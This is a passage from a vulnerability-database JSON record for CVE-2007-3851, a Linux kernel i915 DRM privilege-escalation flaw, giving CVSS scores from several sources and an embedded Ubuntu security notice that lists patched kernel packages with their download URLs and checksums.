        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "7.04"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "25263"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200708-174"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3851"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "2.6.22.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:intel:i915_chipset:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-3851"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The vendor disclosed this issue.",
    "sources": [
      {
        "db": "BID",
        "id": "25263"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200708-174"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2007-3851",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "LOCAL",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 1.5,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:H/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Local",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 1.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2007-3851",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:H/Au:S/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "LOCAL",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 1.5,
            "id": "VHN-27213",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:H/AU:S/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "HIGH",
            "accessVector": "LOCAL",
            "authentication": "SINGLE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 6.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 1.5,
            "id": "CVE-2007-3851",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:H/Au:S/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-3851",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2007-3851",
            "trust": 0.8,
            "value": "Low"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200708-174",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-27213",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2007-3851",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27213"
      },
      {
        "db": "VULMON",
        "id": "CVE-2007-3851"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000692"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200708-174"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3851"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The drm/i915 component in the Linux kernel before 2.6.22.2, when used with i965G and later chipsets, allows local users with access to an X11 session and Direct Rendering Manager (DRM) to write to arbitrary memory locations and gain privileges via a crafted batchbuffer. The Linux kernel is prone to a local privilege-escalation vulnerability. \nExploiting this issue may allow local attackers to gain elevated privileges, facilitating the complete compromise of affected computers. \nVersions of Linux kernel prior to 2.6.22.2 are vulnerable to this issue. =========================================================== \nUbuntu Security Notice USN-510-1            August 31, 2007\nlinux-source-2.6.20 vulnerabilities\nCVE-2007-2525, CVE-2007-2875, CVE-2007-2876, CVE-2007-2878,\nCVE-2007-3104, CVE-2007-3105, CVE-2007-3513, CVE-2007-3642,\nCVE-2007-3843, CVE-2007-3848, CVE-2007-3851, CVE-2007-4308\n===========================================================\n\nA security issue affects the following Ubuntu releases:\n\nUbuntu 7.04\n\nThis advisory also applies to the corresponding versions of\nKubuntu, Edubuntu, and Xubuntu. \n\nThe problem can be corrected by upgrading your system to the\nfollowing package versions:\n\nUbuntu 7.04:\n  linux-image-2.6.20-16-386                    2.6.20-16.31\n  linux-image-2.6.20-16-generic                2.6.20-16.31\n  linux-image-2.6.20-16-hppa32                 2.6.20-16.31\n  linux-image-2.6.20-16-hppa64                 2.6.20-16.31\n  linux-image-2.6.20-16-itanium                2.6.20-16.31\n  linux-image-2.6.20-16-lowlatency             2.6.20-16.31\n  linux-image-2.6.20-16-mckinley               2.6.20-16.31\n  linux-image-2.6.20-16-powerpc                2.6.20-16.31\n  linux-image-2.6.20-16-powerpc-smp            2.6.20-16.31\n  linux-image-2.6.20-16-powerpc64-smp          2.6.20-16.31\n  linux-image-2.6.20-16-server                 2.6.20-16.31\n  linux-image-2.6.20-16-server-bigiron         2.6.20-16.31\n  linux-image-2.6.20-16-sparc64                2.6.20-16.31\n  linux-image-2.6.20-16-sparc64-smp            2.6.20-16.31\n\nAfter a standard system upgrade you need to reboot your computer to\naffect the necessary changes. \n\nDetails follow:\n\nA flaw was discovered in the PPP over Ethernet implementation.  Local\nattackers could manipulate ioctls and cause kernel memory consumption\nleading to a denial of service. (CVE-2007-2525)\n\nAn integer underflow was discovered in the cpuset filesystem.  If mounted,\nlocal attackers could obtain kernel memory using large file offsets while\nreading the tasks file. This could disclose sensitive data. (CVE-2007-2875)\n\nVilmos Nebehaj discovered that the SCTP netfilter code did not correctly\nvalidate certain states.  A remote attacker could send a specially crafted\npacket causing a denial of service. (CVE-2007-2876)\n\nLuca Tettamanti discovered a flaw in the VFAT compat ioctls on 64-bit\nsystems.  A local attacker could corrupt a kernel_dirent struct and cause\na denial of service. (CVE-2007-2878)\n\nA flaw in the sysfs_readdir function allowed a local user to cause a\ndenial of service by dereferencing a NULL pointer. (CVE-2007-3104)\n\nA buffer overflow was discovered in the random number generator.  In\nenvironments with granular assignment of root privileges, a local attacker\ncould gain additional privileges. (CVE-2007-3105)\n\nA flaw was discovered in the usblcd driver.  A local attacker could cause\nlarge amounts of kernel memory consumption, leading to a denial of service. \n(CVE-2007-3513)\n\nZhongling Wen discovered that the h323 conntrack handler did not correctly\nhandle certain bitfields.  A remote attacker could send a specially crafted\npacket and cause a denial of service. (CVE-2007-3642)\n\nA flaw was discovered in the CIFS mount security checking.  Remote\nattackers could spoof CIFS network traffic, which could lead a client\nto trust the connection. (CVE-2007-3843)\n\nIt was discovered that certain setuid-root processes did not correctly\nreset process death signal handlers.  A local user could manipulate this\nto send signals to processes they would not normally have access to. \n(CVE-2007-3848)\n\nThe Direct Rendering Manager for the i915 driver could be made to write\nto arbitrary memory locations.  An attacker with access to a running X11\nsession could send a specially crafted buffer and gain root privileges. \n(CVE-2007-3851)\n\nIt was discovered that the aacraid SCSI driver did not correctly check\npermissions on certain ioctls.  A local attacker could cause a denial\nof service or gain privileges. (CVE-2007-4308)\n\n\nUpdated packages for Ubuntu 7.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.31.diff.gz\n      Size/MD5:  1577853 d02fd4ba44af531c4eb5c8035fbe3a3f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.31.dsc\n      Size/MD5:     2472 b5489267cd7642fc1af25f1a4fb2aa4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz\n      Size/MD5: 62174876 f19203b2488d943a640abe8f3cd20f57\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-16.31_all.deb\n      Size/MD5:  4877040 3c8035f595205bf4ac22cc20acdd6794\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.31_all.deb\n      Size/MD5:    84870 94e07da627c80ce5b54db4f6eb59812b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.31_all.deb\n      Size/MD5: 47822126 598e49bbe0381668e0b471dcb580563f\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    24494 b980d0baa6f45bd2d9c6ea3b71491996\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   202070 30b2f790562a3b5ffc8f6baf54cf5def\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    39354 0933702198ce478aa4b1842c8b12ac8d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    50910 9b7df5269dd71693804155d712008929\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   187502 faf88d2629336c2da3949e4018474771\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    34906 27ab0c4687f3982b121851f2f875e491\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   644422 46b3463556bff461e1b781c381e9ca1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   174704 9c94e0c3af584b38143b1672ae1b0b0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    76424 b53a41dd02648eacb54debe890388be5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    57886 f2d1733f4b960c624f14589a36ec5ebb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   140014 10367ad74fa4252b5d0d080a254938d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   277466 3b3731edab4901d7234fbea7f6c7974e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:  1905414 b7a3da16e9217bae2d90fd2fbf66235c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.31_amd64.deb\n      Size/MD5:   857546 37ed6063fb5c8f4dbfba9ab6dd5736da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.31_amd64.deb\n      Size/MD5:   857378 31446d9184e0346b56680b8321a20734\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.31_amd64.deb\n      Size/MD5:   856618 26eae5ee867cd1c209920aad4c9e3195\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_amd64.deb\n      Size/MD5:  8128538 49ac62df22c8cceeb563991baf7917c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.31_amd64.deb\n      Size/MD5: 23066094 111d7dbd3fcb9c8571f7007c334b1c72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.31_amd64.deb\n      Size/MD5: 23386510 d2a8aeecf1278d8cfa9d73b9ac0920ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.31_amd64.deb\n      Size/MD5: 18427438 060995fe8665a45d2338a4bdd9bb1c0d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.31_amd64.deb\n      Size/MD5: 18698142 e57199fb26fc10293616c4698229fa60\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.31_amd64.deb\n      Size/MD5:   667956 3fc892773a94ea6130e19bbd41223669\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   246420 cdf0e83f330225229d0aac8d756bebef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   144474 52363784520d5673b37c1b00d1825835\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   225016 2cb7db7f772480b16de5a6d03797c5b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:  1110522 41b51553dde0a4c1fe3a6cba67a943ac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:  1754820 0b67f1cc816f96777c4035f4536dc34d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   140922 68de52e127bbeabceda23d61a36322f3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   163320 ad8f39c56c00d85cb69e0d14cd7510d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   265728 f9bf51de08b4b70546e7bb412dedfe5e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    34298 bd875a9e3a6204b2e2c81851e763c501\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    38438 126954fc2b53b6371332715fcf97b8fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    67682 82587156ac6bbf9b24485f3e47ba73e8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    20962 40eadc3c9036b2e47dddc43561eae9d8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:     8328 45da242f89022fb095499adf1ad4229f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    54580 1de7964374ceaa29e42b1ee4c46722b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    86016 301d95060d03db0efbd6a13b087c46dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   322570 ac8b968393ae953b9df98134ae117861\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:  1046886 84c9ea8c539c15bdaff8ca8f37cbdf7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    43976 0ddc45fffff5249b5551b2e673b73b15\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    12012 ccb1f0c0fbc1074e1b1ccbee31630597\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    61918 982e8d147d6b54edb3a8f83adc3c6086\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:   377828 cad9af34b502d072b7922f700d077f47\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.31_amd64.udeb\n      Size/MD5:    66666 628ae089db689328b0a41682bf0e5900\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.31_amd64.deb\n      Size/MD5: 23125936 b1a8c95965a2ef280b13a422a4d6173c\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.31_amd64.deb\n      Size/MD5: 18477150 34a36604a92f81d1560457bd113330b1\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    20322 e8ab9fd789fe1b8f0c8546c00e763e25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    22888 8d0d299344fde6654991003cbac384f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   210074 efa1c3d6a93ccb7296d67b1d0f937681\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   212252 d48b3db497527154d378b6f9bfd0edd3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    88698 e85fbe5bf7d9909d7bc00ce6f7305959\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    35626 cde513a471134d3560aac41fbd6d70cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    37740 fac42d0beab2e5f68baf2e19d76a2778\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    38416 12a300b67959db63206e8122d560489b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    45640 6faf39407cd6c881666e16309202e62d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    45804 5214d5c0756417da98784c85e4ede304\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   179468 53d4e47e8ffe950ccd146666101b7157\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   179830 49c07cb759ae3708ca26e09b15a943b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    32104 e574d74194c75cc699920672b137400a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    32426 3e84e290381c1cf7c2c7c0f7a5a74a6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   648648 416f1cde45a2ecd76de54875150a7879\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   667458 00ea27a9d01f200cb65926ed9d6a9cd6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   178212 a93bea57ce7779cbc4dcce35a5487a64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   181284 2ea1dce0a2d6b197c00946d9a44c3834\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    72392 59330a18dd5e401e938781ef311f31f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    74054 41220f95474992bbd26223aac196f4a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    53578 9a7390218ace76fa1f00e243502c3e81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:    54790 648d4b48dbef21bb4cdb57bd6177947d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   129184 f9e56d8470f376595383fbc54c3d4310\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   134878 ebb36b1cf716fa2f7ef59d2f197b95cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   275956 294313e8e94b96b3b800f2b0830bcd89\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:   274972 6f05cd6698404431694da60df75d5a7d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.31_i386.udeb\n      Size/MD5:  1815218 7ae643f0eb6d41d7570b5b05d4922959\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.31_i386.udeb\n      Size/MD5:  1886534 e8e1809266b9d6e3179fe8208e73e750\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.31_i386.deb\n      Size/MD5:   844272 66490409aa7465bb64db19ca4e37bac1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.31_i386.deb\n      Size/MD5:   849482 eed7f1e2febb4e8b6a1c09ecbbe4251d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.31_i386.deb\n      Size/MD5:   841878 a8c7b5f67015adbf13449a768812df54\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.31_i386.deb\n      Size/MD5:   850348 bc6d77642ca93c95875eeb929cb35d12\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.31_i386.deb\n      Size/MD5:   847286 f5889a4a92ff20c893742a98f366c7f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.31_i386.deb\n      Size/MD5:  8118254 7ae93d26293ec4b8d69995342bd0784d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.31_i386.deb\n      Size/MD5: 23746716 53eb1ff56c3673abb4999657cd1289aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.31_i386.deb\n      Size/MD5: 23812992 1b0cda5d74a37df374841374ca82cddb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.31_i386.deb\n      Size/MD5: 24376420 7059f5cbf8ffc55cb16b62d0fa1d8e79\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.31_i386.deb\n      Size/MD5: 23866754 435d7d5fbb668bb962a681ebafd0d0af\n    